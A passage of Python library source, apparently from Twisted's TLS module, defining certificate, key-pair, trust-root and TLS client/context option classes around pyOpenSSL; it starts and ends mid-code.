U{service_identity <https://pypi.python.org/pypi/service_identity>}
requires pyOpenSSL 0.12 or better but our dependency is still back at 0.10.
Determine if pyOpenSSL has the requisite feature, and whether
C{service_identity} is installed. If so, use it. If not, use simplistic
and incorrect checking as implemented in L{simpleVerifyHostname}.
@return: 2-tuple of (C{verify_hostname}, C{VerificationError})
@rtype: L{tuple}
"""
whatsWrong = (
"Without the service_identity module and a recent enough pyOpenSSL to"
"support it, Twisted can perform only rudimentary TLS client hostname"
"verification. Many valid certificate/hostname mappings may be "
"rejected."
)
if hasattr(crypto.X509, "get_extension_count"):
try:
from service_identity import VerificationError
from service_identity.pyopenssl import verify_hostname
return verify_hostname, VerificationError
except ImportError:
warnings.warn(
"You do not have the service_identity module installed. "
"Please install it from "
"<https://pypi.python.org/pypi/service_identity>. "
+ whatsWrong,
UserWarning,
stacklevel=2
)
else:
warnings.warn(
"Your version of pyOpenSSL, {0}, is out of date. "
"Please upgrade to at least 0.12 and install service_identity "
"from <https://pypi.python.org/pypi/service_identity>. "
.format(version.__version__) + whatsWrong,
UserWarning,
stacklevel=2
)
return simpleVerifyHostname, SimpleVerificationError
verifyHostname, VerificationError = _selectVerifyImplementation()
from zope.interface import Interface, implementer
from twisted.internet.defer import Deferred
from twisted.internet.error import VerifyError, CertificateError
from twisted.internet.interfaces import (
IAcceptableCiphers, ICipher, IOpenSSLClientConnectionCreator
)
from twisted.python import reflect, util
from twisted.python.deprecate import _mutuallyExclusiveArguments
from twisted.python.compat import nativeString, networkString, unicode
from twisted.python.failure import Failure
from twisted.python.util import FancyEqMixin
def _sessionCounter(counter=itertools.count()):
"""
Private - shared between all OpenSSLCertificateOptions, counts up to
provide a unique session id for each context.
"""
return next(counter)
_x509names = {
'CN': 'commonName',
'commonName': 'commonName',
'O': 'organizationName',
'organizationName': 'organizationName',
'OU': 'organizationalUnitName',
'organizationalUnitName': 'organizationalUnitName',
'L': 'localityName',
'localityName': 'localityName',
'ST': 'stateOrProvinceName',
'stateOrProvinceName': 'stateOrProvinceName',
'C': 'countryName',
'countryName': 'countryName',
'emailAddress': 'emailAddress'}
class DistinguishedName(dict):
"""
Identify and describe an entity.
Distinguished names are used to provide a minimal amount of identifying
information about a certificate issuer or subject. They are commonly
created with one or more of the following fields::
commonName (CN)
organizationName (O)
organizationalUnitName (OU)
localityName (L)
stateOrProvinceName (ST)
countryName (C)
emailAddress
A L{DistinguishedName} should be constructed using keyword arguments whose
keys can be any of the field names above (as a native string), and the
values are either Unicode text which is encodable to ASCII, or C{bytes}
limited to the ASCII subset. Any fields passed to the constructor will be
set as attributes, accessable using both their extended name and their
shortened acronym. The attribute values will be the ASCII-encoded
bytes. For example::
>>> dn = DistinguishedName(commonName=b'www.example.com',
C='US')
>>> dn.C
b'US'
>>> dn.countryName
b'US'
>>> hasattr(dn, "organizationName")
False
L{DistinguishedName} instances can also be used as dictionaries; the keys
are extended name of the fields::
>>> dn.keys()
['countryName', 'commonName']
>>> dn['countryName']
b'US'
"""
__slots__ = ()
def __init__(self, **kw):
for k, v in kw.items():
setattr(self, k, v)
def _copyFrom(self, x509name):
for name in _x509names:
value = getattr(x509name, name, None)
if value is not None:
setattr(self, name, value)
def _copyInto(self, x509name):
for k, v in self.items():
setattr(x509name, k, nativeString(v))
def __repr__(self):
return '<DN %s>' % (dict.__repr__(self)[1:-1])
def __getattr__(self, attr):
try:
return self[_x509names[attr]]
except KeyError:
raise AttributeError(attr)
def __setattr__(self, attr, value):
if attr not in _x509names:
raise AttributeError("%s is not a valid OpenSSL X509 name field" % (attr,))
realAttr = _x509names[attr]
if not isinstance(value, bytes):
value = value.encode("ascii")
self[realAttr] = value
def inspect(self):
"""
Return a multi-line, human-readable representation of this DN.
@rtype: C{str}
"""
l = []
lablen = 0
def uniqueValues(mapping):
return set(mapping.values())
for k in sorted(uniqueValues(_x509names)):
label = util.nameToLabel(k)
lablen = max(len(label), lablen)
v = getattr(self, k, None)
if v is not None:
l.append((label, nativeString(v)))
lablen += 2
for n, (label, attr) in enumerate(l):
l[n] = (label.rjust(lablen)+': '+ attr)
return '\n'.join(l)
DN = DistinguishedName
class CertBase:
"""
Base class for public (certificate only) and private (certificate + key
pair) certificates.
@ivar original: The underlying OpenSSL certificate object.
@type original: L{OpenSSL.crypto.X509}
"""
def __init__(self, original):
self.original = original
def _copyName(self, suffix):
dn = DistinguishedName()
dn._copyFrom(getattr(self.original, 'get_'+suffix)())
return dn
def getSubject(self):
"""
Retrieve the subject of this certificate.
@return: A copy of the subject of this certificate.
@rtype: L{DistinguishedName}
"""
return self._copyName('subject')
def __conform__(self, interface):
"""
Convert this L{CertBase} into a provider of the given interface.
@param interface: The interface to conform to.
@type interface: L{Interface}
@return: an L{IOpenSSLTrustRoot} provider or L{NotImplemented}
@rtype: C{interface} or L{NotImplemented}
"""
if interface is IOpenSSLTrustRoot:
return OpenSSLCertificateAuthorities([self.original])
return NotImplemented
def _handleattrhelper(Class, transport, methodName):
"""
(private) Helper for L{Certificate.peerFromTransport} and
L{Certificate.hostFromTransport} which checks for incompatible handle types
and null certificates and raises the appropriate exception or returns the
appropriate certificate object.
"""
method = getattr(transport.getHandle(),
"get_%s_certificate" % (methodName,), None)
if method is None:
raise CertificateError(
"non-TLS transport %r did not have %s certificate" % (transport, methodName))
cert = method()
if cert is None:
raise CertificateError(
"TLS transport %r did not have %s certificate" % (transport, methodName))
return Class(cert)
class Certificate(CertBase):
"""
An x509 certificate.
"""
def __repr__(self):
return '<%s Subject=%s Issuer=%s>' % (self.__class__.__name__,
self.getSubject().commonName,
self.getIssuer().commonName)
def __eq__(self, other):
if isinstance(other, Certificate):
return self.dump() == other.dump()
return False
def __ne__(self, other):
return not self.__eq__(other)
def load(Class, requestData, format=crypto.FILETYPE_ASN1, args=()):
"""
Load a certificate from an ASN.1- or PEM-format string.
@rtype: C{Class}
"""
return Class(crypto.load_certificate(format, requestData), *args)
load = classmethod(load)
_load = load
def dumpPEM(self):
"""
Dump this certificate to a PEM-format data string.
@rtype: C{str}
"""
return self.dump(crypto.FILETYPE_PEM)
def loadPEM(Class, data):
"""
Load a certificate from a PEM-format data string.
@rtype: C{Class}
"""
return Class.load(data, crypto.FILETYPE_PEM)
loadPEM = classmethod(loadPEM)
def peerFromTransport(Class, transport):
"""
Get the certificate for the remote end of the given transport.
@type: L{ISystemHandle}
@rtype: C{Class}
@raise: L{CertificateError}, if the given transport does not have a peer
certificate.
"""
return _handleattrhelper(Class, transport, 'peer')
peerFromTransport = classmethod(peerFromTransport)
def hostFromTransport(Class, transport):
"""
Get the certificate for the local end of the given transport.
@param transport: an L{ISystemHandle} provider; the transport we will
@rtype: C{Class}
@raise: L{CertificateError}, if the given transport does not have a host
certificate.
"""
return _handleattrhelper(Class, transport, 'host')
hostFromTransport = classmethod(hostFromTransport)
def getPublicKey(self):
"""
Get the public key for this certificate.
@rtype: L{PublicKey}
"""
return PublicKey(self.original.get_pubkey())
def dump(self, format=crypto.FILETYPE_ASN1):
return crypto.dump_certificate(format, self.original)
def serialNumber(self):
"""
Retrieve the serial number of this certificate.
@rtype: C{int}
"""
return self.original.get_serial_number()
def digest(self, method='md5'):
"""
Return a digest hash of this certificate using the specified hash
algorithm.
@param method: One of C{'md5'} or C{'sha'}.
@rtype: C{str}
"""
return self.original.digest(method)
def _inspect(self):
return '\n'.join(['Certificate For Subject:',
self.getSubject().inspect(),
'\nIssuer:',
self.getIssuer().inspect(),
'\nSerial Number: %d' % self.serialNumber(),
'Digest: %s' % nativeString(self.digest())])
def inspect(self):
"""
Return a multi-line, human-readable representation of this
Certificate, including information about the subject, issuer, and
public key.
"""
return '\n'.join((self._inspect(), self.getPublicKey().inspect()))
def getIssuer(self):
"""
Retrieve the issuer of this certificate.
@rtype: L{DistinguishedName}
@return: A copy of the issuer of this certificate.
"""
return self._copyName('issuer')
def options(self, *authorities):
raise NotImplementedError('Possible, but doubtful we need this yet')
class CertificateRequest(CertBase):
"""
An x509 certificate request.
Certificate requests are given to certificate authorities to be signed and
returned resulting in an actual certificate.
"""
def load(Class, requestData, requestFormat=crypto.FILETYPE_ASN1):
req = crypto.load_certificate_request(requestFormat, requestData)
dn = DistinguishedName()
dn._copyFrom(req.get_subject())
if not req.verify(req.get_pubkey()):
raise VerifyError("Can't verify that request for %r is self-signed." % (dn,))
return Class(req)
load = classmethod(load)
def dump(self, format=crypto.FILETYPE_ASN1):
return crypto.dump_certificate_request(format, self.original)
class PrivateCertificate(Certificate):
"""
An x509 certificate and private key.
"""
def __repr__(self):
return Certificate.__repr__(self) + ' with ' + repr(self.privateKey)
def _setPrivateKey(self, privateKey):
if not privateKey.matches(self.getPublicKey()):
raise VerifyError(
"Certificate public and private keys do not match.")
self.privateKey = privateKey
return self
def newCertificate(self, newCertData, format=crypto.FILETYPE_ASN1):
"""
Create a new L{PrivateCertificate} from the given certificate data and
this instance's private key.
"""
return self.load(newCertData, self.privateKey, format)
def load(Class, data, privateKey, format=crypto.FILETYPE_ASN1):
return Class._load(data, format)._setPrivateKey(privateKey)
load = classmethod(load)
def inspect(self):
return '\n'.join([Certificate._inspect(self),
self.privateKey.inspect()])
def dumpPEM(self):
"""
Dump both public and private parts of a private certificate to
PEM-format data.
"""
return self.dump(crypto.FILETYPE_PEM) + self.privateKey.dump(crypto.FILETYPE_PEM)
def loadPEM(Class, data):
"""
Load both private and public parts of a private certificate from a
chunk of PEM-format data.
"""
return Class.load(data, KeyPair.load(data, crypto.FILETYPE_PEM),
crypto.FILETYPE_PEM)
loadPEM = classmethod(loadPEM)
def fromCertificateAndKeyPair(Class, certificateInstance, privateKey):
privcert = Class(certificateInstance.original)
return privcert._setPrivateKey(privateKey)
fromCertificateAndKeyPair = classmethod(fromCertificateAndKeyPair)
def options(self, *authorities):
"""
Create a context factory using this L{PrivateCertificate}'s certificate
and private key.
@param authorities: A list of L{Certificate} object
@return: A context factory.
@rtype: L{CertificateOptions <twisted.internet.ssl.CertificateOptions>}
"""
options = dict(privateKey=self.privateKey.original,
certificate=self.original)
if authorities:
options.update(dict(trustRoot=OpenSSLCertificateAuthorities(
[auth.original for auth in authorities]
)))
return OpenSSLCertificateOptions(**options)
def certificateRequest(self, format=crypto.FILETYPE_ASN1,
digestAlgorithm='md5'):
return self.privateKey.certificateRequest(
self.getSubject(),
format,
digestAlgorithm)
def signCertificateRequest(self,
requestData,
verifyDNCallback,
serialNumber,
requestFormat=crypto.FILETYPE_ASN1,
certificateFormat=crypto.FILETYPE_ASN1):
issuer = self.getSubject()
return self.privateKey.signCertificateRequest(
issuer,
requestData,
verifyDNCallback,
serialNumber,
requestFormat,
certificateFormat)
def signRequestObject(self, certificateRequest, serialNumber,
secondsToExpiry=60 * 60 * 24 * 365, # One year
digestAlgorithm='md5'):
return self.privateKey.signRequestObject(self.getSubject(),
certificateRequest,
serialNumber,
secondsToExpiry,
digestAlgorithm)
class PublicKey:
def __init__(self, osslpkey):
self.original = osslpkey
req1 = crypto.X509Req()
req1.set_pubkey(osslpkey)
self._emptyReq = crypto.dump_certificate_request(crypto.FILETYPE_ASN1, req1)
def matches(self, otherKey):
return self._emptyReq == otherKey._emptyReq
# XXX This could be a useful method, but sometimes it triggers a segfault,
# so we'll steer clear for now.
# def verifyCertificate(self, certificate):
# """
# returns None, or raises a VerifyError exception if the certificate
# could not be verified.
# """
# if not certificate.original.verify(self.original):
# raise VerifyError("We didn't sign that certificate.")
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.keyHash())
def keyHash(self):
"""
MD5 hex digest of signature on an empty certificate request with this
key.
"""
return md5(self._emptyReq).hexdigest()
def inspect(self):
return 'Public Key with Hash: %s' % (self.keyHash(),)
class KeyPair(PublicKey):
def load(Class, data, format=crypto.FILETYPE_ASN1):
return Class(crypto.load_privatekey(format, data))
load = classmethod(load)
def dump(self, format=crypto.FILETYPE_ASN1):
return crypto.dump_privatekey(format, self.original)
def __getstate__(self):
return self.dump()
def __setstate__(self, state):
self.__init__(crypto.load_privatekey(crypto.FILETYPE_ASN1, state))
def inspect(self):
t = self.original.type()
if t == crypto.TYPE_RSA:
ts = 'RSA'
elif t == crypto.TYPE_DSA:
ts = 'DSA'
else:
ts = '(Unknown Type!)'
L = (self.original.bits(), ts, self.keyHash())
return '%s-bit %s Key Pair with Hash: %s' % L
def generate(Class, kind=crypto.TYPE_RSA, size=1024):
pkey = crypto.PKey()
pkey.generate_key(kind, size)
return Class(pkey)
def newCertificate(self, newCertData, format=crypto.FILETYPE_ASN1):
return PrivateCertificate.load(newCertData, self, format)
generate = classmethod(generate)
def requestObject(self, distinguishedName, digestAlgorithm='md5'):
req = crypto.X509Req()
req.set_pubkey(self.original)
distinguishedName._copyInto(req.get_subject())
req.sign(self.original, digestAlgorithm)
return CertificateRequest(req)
def certificateRequest(self, distinguishedName,
format=crypto.FILETYPE_ASN1,
digestAlgorithm='md5'):
"""Create a certificate request signed with this key.
@return: a string, formatted according to the 'format' argument.
"""
return self.requestObject(distinguishedName, digestAlgorithm).dump(format)
def signCertificateRequest(self,
issuerDistinguishedName,
requestData,
verifyDNCallback,
serialNumber,
requestFormat=crypto.FILETYPE_ASN1,
certificateFormat=crypto.FILETYPE_ASN1,
secondsToExpiry=60 * 60 * 24 * 365, # One year
digestAlgorithm='md5'):
"""
Given a blob of certificate request data and a certificate authority's
DistinguishedName, return a blob of signed certificate data.
If verifyDNCallback returns a Deferred, I will return a Deferred which
fires the data when that Deferred has completed.
"""
hlreq = CertificateRequest.load(requestData, requestFormat)
dn = hlreq.getSubject()
vval = verifyDNCallback(dn)
def verified(value):
if not value:
raise VerifyError("DN callback %r rejected request DN %r" % (verifyDNCallback, dn))
return self.signRequestObject(issuerDistinguishedName, hlreq,
serialNumber, secondsToExpiry, digestAlgorithm).dump(certificateFormat)
if isinstance(vval, Deferred):
return vval.addCallback(verified)
else:
return verified(vval)
def signRequestObject(self,
issuerDistinguishedName,
requestObject,
serialNumber,
secondsToExpiry=60 * 60 * 24 * 365, # One year
digestAlgorithm='md5'):
"""
Sign a CertificateRequest instance, returning a Certificate instance.
"""
req = requestObject.original
cert = crypto.X509()
issuerDistinguishedName._copyInto(cert.get_issuer())
cert.set_subject(req.get_subject())
cert.set_pubkey(req.get_pubkey())
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(secondsToExpiry)
cert.set_serial_number(serialNumber)
cert.sign(self.original, digestAlgorithm)
return Certificate(cert)
def selfSignedCert(self, serialNumber, **kw):
dn = DN(**kw)
return PrivateCertificate.fromCertificateAndKeyPair(
self.signRequestObject(dn, self.requestObject(dn), serialNumber),
self)
class IOpenSSLTrustRoot(Interface):
"""
Trust settings for an OpenSSL context.
Note that this interface's methods are private, so things outside of
Twisted shouldn't implement it.
"""
def _addCACertsToContext(context):
"""
Add certificate-authority certificates to an SSL context whose
connections should trust those authorities.
@param context: An SSL context for a connection which should be
verified by some certificate authority.
@type context: L{OpenSSL.SSL.Context}
@return: L{None}
"""
@implementer(IOpenSSLTrustRoot)
class OpenSSLCertificateAuthorities(object):
"""
Trust an explicitly specified set of certificates, represented by a list of
L{OpenSSL.crypto.X509} objects.
"""
def __init__(self, caCerts):
"""
@param caCerts: The certificate authorities to trust when using this
object as a C{trustRoot} for L{OpenSSLCertificateOptions}.
@type caCerts: L{list} of L{OpenSSL.crypto.X509}
"""
self._caCerts = caCerts
def _addCACertsToContext(self, context):
store = context.get_cert_store()
for cert in self._caCerts:
store.add_cert(cert)
@implementer(IOpenSSLTrustRoot)
class OpenSSLDefaultPaths(object):
"""
Trust the set of default verify paths that OpenSSL was built with, as
specified by U{SSL_CTX_set_default_verify_paths
<https://www.openssl.org/docs/ssl/SSL_CTX_load_verify_locations.html>}.
"""
def _addCACertsToContext(self, context):
context.set_default_verify_paths()
def platformTrust():
"""
Attempt to discover a set of trusted certificate authority certificates
(or, in other words: trust roots, or root certificates) whose trust is
managed and updated by tools outside of Twisted.
If you are writing any client-side TLS code with Twisted, you should use
this as the C{trustRoot} argument to L{CertificateOptions
<twisted.internet.ssl.CertificateOptions>}.
The result of this function should be like the up-to-date list of
certificates in a web browser. When developing code that uses
C{platformTrust}, you can think of it that way. However, the choice of
which certificate authorities to trust is never Twisted's responsibility.
Unless you're writing a very unusual application or library, it's not your
code's responsibility either. The user may use platform-specific tools for
defining which server certificates should be trusted by programs using TLS.
The purpose of using this API is to respect that decision as much as
possible.
This should be a set of trust settings most appropriate for I{client} TLS
connections; i.e. those which need to verify a server's authenticity. You
should probably use this by default for any client TLS connection that you
create. For servers, however, client certificates are typically not
verified; or, if they are, their verification will depend on a custom,
application-specific certificate authority.
@since: 14.0
@note: Currently, L{platformTrust} depends entirely upon your OpenSSL build
supporting a set of "L{default verify paths <OpenSSLDefaultPaths>}"
which correspond to certificate authority trust roots. Unfortunately,
whether this is true of your system is both outside of Twisted's
control and difficult (if not impossible) for Twisted to detect
automatically.
Nevertheless, this ought to work as desired by default on:
- Ubuntu Linux machines with the U{ca-certificates
<https://launchpad.net/ubuntu/+source/ca-certificates>} package
installed,
- Mac OS X when using the system-installed version of OpenSSL (i.e.
I{not} one installed via MacPorts or Homebrew),
- any build of OpenSSL which has had certificate authority
certificates installed into its default verify paths (by default,
C{/usr/local/ssl/certs} if you've built your own OpenSSL), or
- any process where the C{SSL_CERT_FILE} environment variable is
set to the path of a file containing your desired CA certificates
bundle.
Hopefully soon, this API will be updated to use more sophisticated
trust-root discovery mechanisms. Until then, you can follow tickets in
the Twisted tracker for progress on this implementation on U{Microsoft
Windows <https://twistedmatrix.com/trac/ticket/6371>}, U{Mac OS X
<https://twistedmatrix.com/trac/ticket/6372>}, and U{a fallback for
other platforms which do not have native trust management tools
<https://twistedmatrix.com/trac/ticket/6934>}.
@return: an appropriate trust settings object for your platform.
@rtype: L{IOpenSSLTrustRoot}
@raise NotImplementedError: if this platform is not yet supported by
Twisted. At present, only OpenSSL is supported.
"""
return OpenSSLDefaultPaths()
def _tolerateErrors(wrapped):
"""
Wrap up an C{info_callback} for pyOpenSSL so that if something goes wrong
the error is immediately logged and the connection is dropped if possible.
This wrapper exists because some versions of pyOpenSSL don't handle errors
from callbacks at I{all}, and those which do write tracebacks directly to
stderr rather than to a supplied logging system. This reports unexpected
errors to the Twisted logging system.
Also, this terminates the connection immediately if possible because if
you've got bugs in your verification logic it's much safer to just give up.
@param wrapped: A valid C{info_callback} for pyOpenSSL.
@type wrapped: L{callable}
@return: A valid C{info_callback} for pyOpenSSL that handles any errors in
C{wrapped}.
@rtype: L{callable}
"""
def infoCallback(connection, where, ret):
try:
return wrapped(connection, where, ret)
except:
f = Failure()
log.err(f, "Error during info_callback")
connection.get_app_data().failVerification(f)
return infoCallback
@implementer(IOpenSSLClientConnectionCreator)
class ClientTLSOptions(object):
"""
Client creator for TLS.
Private implementation type (not exposed to applications) for public
L{optionsForClientTLS} API.
@ivar _ctx: The context to use for new connections.
@type _ctx: L{SSL.Context}
@ivar _hostname: The hostname to verify, as specified by the application,
as some human-readable text.
@type _hostname: L{unicode}
@ivar _hostnameBytes: The hostname to verify, decoded into IDNA-encoded
bytes. This is passed to APIs which think that hostnames are bytes,
such as OpenSSL's SNI implementation.
@type _hostnameBytes: L{bytes}
@ivar _hostnameASCII: The hostname, as transcoded into IDNA ASCII-range
unicode code points. This is pre-transcoded because the
C{service_identity} package is rather strict about requiring the
C{idna} package from PyPI for internationalized domain names, rather
than working with Python's built-in (but sometimes broken) IDNA
encoding. ASCII values, however, will always work.
@type _hostnameASCII: L{unicode}
"""
def __init__(self, hostname, ctx):
"""
Initialize L{ClientTLSOptions}.
@param hostname: The hostname to verify as input by a human.
@type hostname: L{unicode}
@param ctx: an L{SSL.Context} to use for new connections.
@type ctx: L{SSL.Context}.
"""
self._ctx = ctx
self._hostname = hostname
self._hostnameBytes = _idnaBytes(hostname)
self._hostnameASCII = self._hostnameBytes.decode("ascii")
ctx.set_info_callback(
_tolerateErrors(self._identityVerifyingInfoCallback)
)
def clientConnectionForTLS(self, tlsProtocol):
"""
Create a TLS connection for a client.
@note: This will call C{set_app_data} on its connection. If you're
delegating to this implementation of this method, don't ever call
C{set_app_data} or C{set_info_callback} on the returned connection,
or you'll break the implementation of various features of this
class.
@param tlsProtocol: the TLS protocol initiating the connection.
@type tlsProtocol: L{twisted.protocols.tls.TLSMemoryBIOProtocol}
@return: the configured client connection.
@rtype: L{OpenSSL.SSL.Connection}
"""
context = self._ctx
connection = SSL.Connection(context, None)
connection.set_app_data(tlsProtocol)
return connection
def _identityVerifyingInfoCallback(self, connection, where, ret):
"""
U{info_callback
<http://pythonhosted.org/pyOpenSSL/api/ssl.html#OpenSSL.SSL.Context.set_info_callback>
} for pyOpenSSL that verifies the hostname in the presented certificate
matches the one passed to this L{ClientTLSOptions}.
@param connection: the connection which is handshaking.
@type connection: L{OpenSSL.SSL.Connection}
@param where: flags indicating progress through a TLS handshake.
@type where: L{int}
@param ret: ignored
@type ret: ignored
"""
if where & SSL_CB_HANDSHAKE_START:
_maybeSetHostNameIndication(connection, self._hostnameBytes)
elif where & SSL_CB_HANDSHAKE_DONE:
try:
verifyHostname(connection, self._hostnameASCII)
except VerificationError:
f = Failure()
transport = connection.get_app_data()
transport.failVerification(f)
def optionsForClientTLS(hostname, trustRoot=None, clientCertificate=None,
**kw):
"""
Create a L{client connection creator <IOpenSSLClientConnectionCreator>} for
use with APIs such as L{SSL4ClientEndpoint
<twisted.internet.endpoints.SSL4ClientEndpoint>}, L{connectSSL
<twisted.internet.interfaces.IReactorSSL.connectSSL>}, and L{startTLS
<twisted.internet.interfaces.ITLSTransport.startTLS>}.
@since: 14.0
@param hostname: The expected name of the remote host. This serves two
purposes: first, and most importantly, it verifies that the certificate
received from the server correctly identifies the specified hostname.
The second purpose is (if the local C{pyOpenSSL} supports it) to use
the U{Server Name Indication extension
<https://en.wikipedia.org/wiki/Server_Name_Indication>} to indicate to
the server which certificate should be used.
@type hostname: L{unicode}
@param trustRoot: Specification of trust requirements of peers. This may
be a L{Certificate} or the result of L{platformTrust}. By default it
is L{platformTrust} and you probably shouldn't adjust it unless you
really know what you're doing. Be aware that clients using this
interface I{must} verify the server; you cannot explicitly pass C{None}
since that just means to use L{platformTrust}.
@type trustRoot: L{IOpenSSLTrustRoot}
@param clientCertificate: The certificate and private key that the client
will use to authenticate to the server. If unspecified, the client
will not authenticate.
@type clientCertificate: L{PrivateCertificate}
@param extraCertificateOptions: keyword-only argument; this is a dictionary
of additional keyword arguments to be presented to
L{CertificateOptions}. Please avoid using this unless you absolutely
need to; any time you need to pass an option here that is a bug in this
interface.
@type extraCertificateOptions: L{dict}
@param kw: (Backwards compatibility hack to allow keyword-only arguments on
Python 2. Please ignore; arbitrary keyword arguments will be errors.)
@type kw: L{dict}
@return: A client connection creator.
@rtype: L{IOpenSSLClientConnectionCreator}
"""
extraCertificateOptions = kw.pop('extraCertificateOptions', None) or {}
if trustRoot is None:
trustRoot = platformTrust()
if kw:
raise TypeError(
"optionsForClientTLS() got an unexpected keyword argument"
" '{arg}'".format(
arg=kw.popitem()[0]
)
)
if not isinstance(hostname, unicode):
raise TypeError(
"optionsForClientTLS requires text for host names, not "
+ hostname.__class__.__name__
)
if clientCertificate:
extraCertificateOptions.update(
privateKey=clientCertificate.privateKey.original,
certificate=clientCertificate.original
)
certificateOptions = OpenSSLCertificateOptions(
trustRoot=trustRoot,
**extraCertificateOptions
)
return ClientTLSOptions(hostname, certificateOptions.getContext())
class OpenSSLCertificateOptions(object):
"""
A L{CertificateOptions <twisted.internet.ssl.CertificateOptions>} specifies
the security properties for a client or server TLS connection used with
OpenSSL.
@ivar _options: Any option flags to set on the L{OpenSSL.SSL.Context}
object that will be created.
@type _options: L{int}
@ivar _cipherString: An OpenSSL-specific cipher string.
@type _cipherString: L{unicode}
"""
# Factory for creating contexts. Configurable for testability.
_contextFactory = SSL.Context
_context = None
# Some option constants may not be exposed by PyOpenSSL yet.
_OP_ALL = getattr(SSL, 'OP_ALL', 0x0000FFFF)
_OP_NO_TICKET = getattr(SSL, 'OP_NO_TICKET', 0x00004000)
_OP_NO_COMPRESSION = getattr(SSL, 'OP_NO_COMPRESSION', 0x00020000)
_OP_CIPHER_SERVER_PREFERENCE = getattr(SSL, 'OP_CIPHER_SERVER_PREFERENCE ',
0x00400000)
_OP_SINGLE_ECDH_USE = getattr(SSL, 'OP_SINGLE_ECDH_USE ', 0x00080000)
@_mutuallyExclusiveArguments([
['trustRoot', 'requireCertificate'],
['trustRoot', 'verify'],
['trustRoot', 'caCerts'],
])
def __init__(self,
privateKey=None,
certificate=None,
method=None,
verify=False,
caCerts=None,
verifyDepth=9,
requireCertificate=True,
verifyOnce=True,
enableSingleUseKeys=True,
enableSessions=True,
fixBrokenPeers=False,
enableSessionTickets=False,
extraCertChain=None,
acceptableCiphers=None,
dhParameters=None,
trustRoot=None):
"""
Create an OpenSSL context SSL connection context factory.
@param privateKey: A PKey object holding the private key.
@param certificate: An X509 object holding the certificate.
@param method: The SSL protocol to use, one of SSLv23_METHOD,
SSLv2_METHOD, SSLv3_METHOD, TLSv1_METHOD (or any other method
constants provided by pyOpenSSL). By default, a setting will be
used which allows TLSv1.0, TLSv1.1, and TLSv1.2.
@param verify: Please use a C{trustRoot} keyword argument instead,
since it provides the same functionality in a less error-prone way.
By default this is L{False}.
If L{True}, verify certificates received from the peer and fail the
handshake if verification fails. Otherwise, allow anonymous
sessions and sessions with certificates which fail validation.
@param caCerts: Please use a C{trustRoot} keyword argument instead,
since it provides the same functionality in a less error-prone way.
List of certificate authority certificate objects to use to verify
the peer's certificate. Only used if verify is L{True} and will be
ignored otherwise. Since verify is L{False} by default, this is
C{None} by default.
@type caCerts: C{list} of L{OpenSSL.crypto.X509}
@param verifyDepth: Depth in certificate chain down to which to verify.
If unspecified, use the underlying default (9).
@param requireCertificate: Please use a C{trustRoot} keyword argument
instead, since it provides the same functionality in a less
error-prone way.
If L{True}, do not allow anonymous sessions; defaults to L{True}.
@param verifyOnce: If True, do not re-verify the certificate on session
resumption.
@param enableSingleUseKeys: If L{True}, generate a new key whenever
ephemeral DH and ECDH parameters are used to prevent small subgroup
attacks and to ensure perfect forward secrecy.
@param enableSessions: If True, set a session ID on each context. This
allows a shortened handshake to be used when a known client
reconnects.
@param fixBrokenPeers: If True, enable various non-spec protocol fixes
for broken SSL implementations. This should be entirely safe,
according to the OpenSSL documentation, but YMMV. This option is
now off by default, because it causes problems with connections
between peers using OpenSSL 0.9.8a.
@param enableSessionTickets: If L{True}, enable session ticket
extension for session resumption per RFC 5077. Note there is no
support for controlling session tickets. This option is off by
default, as some server implementations don't correctly process
incoming empty session ticket extensions in the hello.
@param extraCertChain: List of certificates that I{complete} your
verification chain if the certificate authority that signed your
C{certificate} isn't widely supported. Do I{not} add
C{certificate} to it.
@type extraCertChain: C{list} of L{OpenSSL.crypto.X509}
@param acceptableCiphers: Ciphers that are acceptable for connections.
Uses a secure default if left L{None}.
@type acceptableCiphers: L{IAcceptableCiphers}
@param dhParameters: Key generation parameters that are required for
Diffie-Hellman key exchange. If this argument is left L{None},
C{EDH} ciphers are I{disabled} regardless of C{acceptableCiphers}.
@type dhParameters: L{DiffieHellmanParameters
<twisted.internet.ssl.DiffieHellmanParameters>}
@param trustRoot: Specification of trust requirements of peers. If
this argument is specified, the peer is verified. It requires a
certificate, and that certificate must be signed by one of the
certificate authorities specified by this object.
Note that since this option specifies the same information as
C{caCerts}, C{verify}, and C{requireCertificate}, specifying any of
those options in combination with this one will raise a
L{TypeError}.
@type trustRoot: L{IOpenSSLTrustRoot}
@raise ValueError: when C{privateKey} or C{certificate} are set without
setting the respective other.
@raise ValueError: when C{verify} is L{True} but C{caCerts} doesn't
specify any CA certificates.
@raise ValueError: when C{extraCertChain} is passed without specifying
C{privateKey} or C{certificate}.
@raise ValueError: when C{acceptableCiphers} doesn't yield any usable
ciphers for the current platform.
@raise TypeError: if C{trustRoot} is passed in combination with
C{caCert}, C{verify}, or C{requireCertificate}. Please prefer
C{trustRoot} in new code, as its semantics are less tricky.
"""
if (privateKey is None) != (certificate is None):
raise ValueError(
"Specify neither or both of privateKey and certificate")
self.privateKey = privateKey
self.certificate = certificate
# Set basic security options: disallow insecure SSLv2, disallow TLS
# compression to avoid CRIME attack, make the server choose the
# ciphers.
self._options = (
SSL.OP_NO_SSLv2 | self._OP_NO_COMPRESSION |
self._OP_CIPHER_SERVER_PREFERENCE
)
if method is None:
# If no method is specified set things up so that TLSv1.0 and newer
# will be supported.
self.method = SSL.SSLv23_METHOD
self._options |= SSL.OP_NO_SSLv3
else:
# Otherwise respect the application decision.
self.method = method
if verify and not caCerts:
raise ValueError("Specify client CA certificate information if and"
" only if enabling certificate verification")
self.verify = verify
if extraCertChain is not None and None in (privateKey, certificate):
raise ValueError("A private key and a certificate are required "
"when adding a supplemental certificate chain.")
if extraCertChain is not None:
self.extraCertChain = extraCertChain
else:
self.extraCertChain = []
self.caCerts = caCerts
self.verifyDepth = verifyDepth
self.requireCertificate = requireCertificate
self.verifyOnce = verifyOnce
self.enableSingleUseKeys = enableSingleUseKeys
if enableSingleUseKeys:
self._options |= SSL.OP_SINGLE_DH_USE | self._OP_SINGLE_ECDH_USE
self.enableSessions = enableSessions
self.fixBrokenPeers = fixBrokenPeers
if fixBrokenPeers:
self._options |= self._OP_ALL
self.enableSessionTickets = enableSessionTickets
if not enableSessionTickets:
self._options |= self._OP_NO_TICKET
self.dhParameters = dhParameters
try:
self._ecCurve = _OpenSSLECCurve(_defaultCurveName)
except NotImplementedError:
self._ecCurve = None
if acceptableCiphers is None:
acceptableCiphers = defaultCiphers
# This needs to run when method and _options are finalized.
self._cipherString = u':'.join(
c.fullName
